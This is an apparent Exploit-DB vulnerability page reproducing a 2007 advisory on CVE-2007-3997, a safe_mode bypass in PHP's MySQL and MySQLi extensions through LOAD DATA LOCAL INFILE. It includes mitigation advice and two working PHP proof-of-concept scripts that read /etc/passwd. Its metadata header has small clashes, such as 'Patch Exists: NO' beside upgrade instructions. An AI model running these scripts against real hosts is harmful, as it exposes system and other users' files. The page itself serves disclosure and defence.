PHP MySQL and MySQLi Extensions Safe Mode Bypass

vendor:

PHP

by:

Mattias Bengtsson, Philip Olausson

7.5

CVSS

HIGH

Safe Mode Bypass

264

CWE

Product Name: PHP

Affected Version From: PHP 5.2.3, PHP 4.4.7

Affected Version To: PHP versions prior to the fixed versions

Patch Exists: NO

Related CWE: CVE-2007-3997

CPE: a:php:php

Metasploit: https://www.rapid7.com/db/vulnerabilities/php-cve-2007-4889/, https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2007-3997/, https://www.rapid7.com/db/vulnerabilities/php-cve-2007-3997/

Other Scripts:

Platforms Tested:

2007

PHP MySQL and MySQLi Extensions Safe Mode Bypass

A vulnerability exists in PHP's MySQL and MySQLi extensions which can be used to bypass PHP's safe_mode security restriction.

Mitigation:

Upgrade to a version of PHP that is not affected. Alternatively, disable the MySQL and MySQLi extensions in PHP.

Source

Exploit-DB raw data:

Affected Products:
<= PHP 5.2.3
<= PHP 4.4.7

Authors:
Mattias Bengtsson <mattias@secweb.se>
Philip Olausson <po@secweb.se>

Reported:
2007-06-05

Released:
2007-08-30

CVE:
CVE-2007-3997

Issue:

A vulnerability exists in PHP's MySQL and MySQLi extenstions which can be used to bypass PHP's safe_mode security restriction.

Description:

PHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML.

Details:

By using MySQLs LOCAL INFILE we could bypass PHP's safe_mode security restriction. An important thing here is that we can't rely on the shared hosts MySQLds local-infile=0 option. This because of it being a server option, so it will not have any effect on the client. To disable this option for MySQL we need to compile libmysqlclient with --disable-local-infile, or remove the CLIENT_LOCAL_FILES flag while connecting. PHP does this when open_basedir are in effect but lacks a check for safe_mode.

For MySQLi compiling with --disable-local-infile won't help because we could just reenable it with mysqli->options(MYSQLI_OPT_LOCAL_INFILE, 1);

Proof Of Concepts:

MySQL: 

<?php

file_get_contents('/etc/passwd');

$l = mysql_connect("localhost", "root");
mysql_query("CREATE DATABASE a");
mysql_query("CREATE TABLE a.a (a varchar(1024))");
mysql_query("GRANT SELECT,INSERT ON a.a TO 'aaaa'@'localhost'");
mysql_close($l); mysql_connect("localhost", "aaaa");

mysql_query("LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE a.a");

$result = mysql_query("SELECT a FROM a.a");
while(list($row) = mysql_fetch_row($result))
    print $row . chr(10);

?>

MySQLi:

<?php

function r($fp, &$buf, $len, &$err) {
      print fread($fp, $len);
}

$m = new mysqli('localhost', 'aaaa', '', 'a');
$m->options(MYSQLI_OPT_LOCAL_INFILE, 1);
$m->set_local_infile_handler("r");
$m->query("LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE a.a");
$m->close();

?>

Impact:

This issue could have major impact on shared hosting systems.

Solution:

Upgrade PHP to 5.2.4 or 4.4.8

# milw0rm.com [2007-09-10]